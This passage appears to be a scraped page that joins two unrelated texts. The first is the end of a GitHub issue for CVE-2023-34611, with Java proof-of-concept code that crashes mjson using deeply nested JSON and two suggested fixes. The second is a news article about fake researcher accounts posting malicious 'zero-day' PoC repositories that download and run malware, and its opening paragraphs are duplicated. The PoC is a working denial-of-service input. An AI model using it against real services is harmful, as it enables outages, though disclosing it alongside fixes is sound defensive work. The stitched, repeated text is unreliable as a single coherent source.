            }
        }
        sb.append("\\n").append(content).append("\\n");
        for (int i = 0; i < nesting; ++i) {
            sb.append(close);
            if ((i & 31) == 0) {
                sb.append("\\n");
            }
        }
        return sb.toString();
    }

    public static void main(String\[\] args) {
        String jsonString = TOO\_DEEP\_DOC;
        Json.read(jsonString);
    }
}

**Rectification Solution**

1.  Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)
    
2.  Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.(（google/gson@2d01d6a20f39881c692977564c1ea591d9f39027）)

CVE-2023-34611: Stack overflow error caused by mjson parsing of untrusted JSON String · Issue #40 · bolerio/mjson

At least half of dozen GitHub accounts from fake researchers associated with a fraudulent cybersecurity company have been observed pushing malicious repositories on the code hosting service.
All seven repositories, which are still available as of writing, claim to be a proof-of-concept (PoC) exploit for purported zero-day flaws in Discord, Google Chrome, and Microsoft Exchange.
VulnCheck, which

At least half of dozen GitHub accounts from fake researchers associated with a fraudulent cybersecurity company have been observed pushing malicious repositories on the code hosting service.

All seven repositories, which are still available as of writing, claim to be a proof-of-concept (PoC) exploit for purported zero-day flaws in Discord, Google Chrome, and Microsoft Exchange.

VulnCheck, which discovered the activity, said, "the individuals creating these repositories have put significant effort into making them look legitimate by creating a network of accounts and Twitter profiles, pretending to be part of a non-existent company called High Sierra Cyber Security."

The cybersecurity firm said it first came across the rogue repositories in early May when they were observed pushing similar PoC exploits for zero-day bugs in Signal and WhatsApp. The two repositories have since been taken down.

Besides sharing some of the purported findings on Twitter in an attempt to build legitimacy, the network of accounts even uses headshots of actual security researchers from companies like Rapid7, suggesting that the threat actors put significant effort into crafting the campaign.

The PoC is a Python script that's designed to download a malicious binary and execute it on the victim's operating system, be it Windows or Linux.

UPCOMING WEBINAR

🔐 Mastering API Security: Understanding Your True Attack Surface

Discover the untapped vulnerabilities in your API ecosystem and take proactive steps towards ironclad security. Join our insightful webinar!

Join the Session

"The attacker has made a lot of effort to create all these fake personas, only to deliver very obvious malware," VulnCheck researcher Jacob Baines said. "It's unclear if they have been successful, but given that they've continued to pursue this avenue of attacks, it seems they believe they _will_ be successful."

It's currently not known if this is the work of an amateur actor or an advanced persistent threat (APT). But security researchers have previously come under the radar of North Korean nation-state groups, as revealed by Google in January 2021.

If anything, the findings show the need for exercising caution when it comes to downloading code from open source repositories. It's also essential that users scrutinize the code prior to execution to ensure they don't pose any security risks.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#google